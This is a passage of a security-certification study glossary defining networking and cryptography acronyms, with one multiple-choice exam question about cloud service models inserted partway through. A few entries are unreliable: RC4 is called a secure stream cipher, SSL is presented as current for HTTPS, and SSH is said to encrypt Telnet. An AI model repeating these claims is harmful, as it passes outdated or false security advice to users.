Electromagnetic interference. Interference caused by motors, power lines, and fluorescent lights. Cables can be shielded to protect signals from EMI. Additionally, EMI shielding prevents signal emanation, so it can prevent someone from capturing network traffic.

ECC

Elliptic curve cryptography. An asymmetric encryption algorithm commonly used with smaller wireless devices. It uses smaller key sizes and requires less processing power than many other encryption methods.

ESP

Encapsulating Security Protocol. IPsec includes both AH and ESP. AH provides authentication and integrity, and ESP provides confidentiality, integrity, and authentication. ESP is identified with protocol ID number 50.

EFS

Encrypting File System. A feature within NTFS on Windows systems that supports encrypting individual files or folders for confidentiality.

XTACACS

Extended Terminal Access Controller Access-Control System. An improvement over TACACS developed by Cisco Systems and proprietary to Cisco systems. TACACS+ is more commonly used.

QUESTION 14 When it comes to cloud computing, if one of the requirements for a project is to have the most control over the systems in the cloud, which of the following is a service model that would be BEST suited for this goal? A. Infrastructure as a Service B. Platform as a Service C. Software as a Service D. Virtualization as a Service

RIPEMD

RACE Integrity Primitives Evaluation Message Digest. A hash function used for integrity. It creates fixed-length hashes of 128, 160, 256, or 320 bits.

RFI

Radio frequency interference. Interference from RF sources such as AM or FM transmitters. RFI can be filtered to prevent data interference, and cables can be shielded to protect signals from RFI.

RAM

Random Access Memory. Volatile memory within a computer that holds active processes, data, and applications. Data in RAM is lost when the computer is turned off. Inspection of RAM can discover hooked processes from rootkits. Memory forensics analyzes data in RAM.

RSTP

Rapid Spanning Tree Protocol. An improvement over STP. STP and RSTP protocols are enabled on most switches and protect against switching loops, such as those caused when two ports of a switch are connected together.

RTP

Real-time Transport Protocol. A standard used for delivering audio and video over an IP network.

RPO

Recovery Point Objective. A Recovery Point Objective identifies a point in time where data loss is acceptable. It is related to the RTO, and the BIA often includes both RTOs and RPOs.

RTO

Recovery Time Objective. An RTO identifies the maximum amount of time it can take to restore a system after an outage. It is related to the RPO, and the BIA often includes both RTOs and RPOs.

RA

Recovery agent. A designated individual who can recover or restore cryptographic keys. In the context of a PKI, a recovery agent can recover private keys to access encrypted data.

RAID

Redundant Array of Inexpensive (or Independent) Disks. Multiple disks added together to increase performance or provide protection against faults.

RAS

Remote Access Service. A server used to provide access to an internal network from an outside location. RAS is also known as Remote Access Server and sometimes referred to as Network Access Service (NAS).

RADIUS

Remote Authentication Dial-In User Service. Provides central authentication for remote access clients. RADIUS encrypts the password packets and uses UDP. In contrast, TACACS+ encrypts the entire authentication process and uses TCP.

RBAC

Role-based access control. An access control model that uses roles to define access and it is often implemented with groups. A user account is placed into a role, inheriting the rights and permissions of the role. Other access control models are MAC and DAC.

RC

Ron's Code or Rivest's Cipher. Symmetric encryption algorithm that includes versions RC2, RC4, RC5, and RC6. RC4 is a secure stream cipher, and RC5 and RC6 are block ciphers.

RBAC

Rule-based access control. An access control model that uses rules to define access. Rule-based access control is based on a set of approved instructions, such as an access control list. Other access control models are MAC and DAC.

SFTP

Secure FTP. An extension of Secure Shell (SSH) using SSH to transmit the files in an encrypted format. SFTP transmits data using port 22.

SHA

Secure Hash Algorithm. A hashing function used to provide integrity. SHA1 uses 160 bits, and SHA-256 uses 256 bits. Hashing algorithms always provide a fixed-size bit-string regardless of the size of the hashed data. By comparing the hashes at two different times, you can verify integrity of the data.

SHTTP

Secure Hypertext Transfer Protocol. An alternative to HTTPS. Infrequently used.

SSH

Secure Shell. SSH encrypts a wide variety of traffic such as Secure File Transfer Protocol (SFTP), Telnet, and Secure Copy (SCP). SSH uses port 22.

SSTP

Secure Socket Tunneling Protocol. A tunneling protocol that encrypts VPN traffic using SSL over port 443.

SSL

Secure Sockets Layer. Used to encrypt traffic on the wire. SSL is used with HTTPS to encrypt HTTP traffic on the Internet using both symmetric and asymmetric encryption algorithms. SSL uses port 443 when encrypting HTTPS traffic.

SCP

Secure copy. Based on SSH, SCP allows users to copy encrypted files over a network. SCP uses port 22.

S/MIME

Secure/Multipurpose Internet Mail Extensions. Used to secure e-mail. S/MIME provides confidentiality, integrity, authentication, and non-repudiation. It can digitally sign and encrypt e-mail, including the encryption of e-mail at rest (stored on a drive) and in transit (data sent over the network). It uses RSA, with public and private keys for encryption and decryption, and depends on a PKI for certificates.

SCAP

Security Content Automation Protocol. A method with automated vulnerability management, measurement, and policy compliance evaluation tools.

SIRT

Security Incident Response Team. A group of experts that respond to security incidents. Also known as CERT or IRT.

SID

Security identifier. Unique set of numbers and letters used to identify each user and each group in Microsoft environments.

SELinux

Security-Enhanced Linux. A trusted operating system platform that prevents malicious or suspicious code from executing on both Linux and UNIX systems. It is one of the few operating systems that use the MAC model.
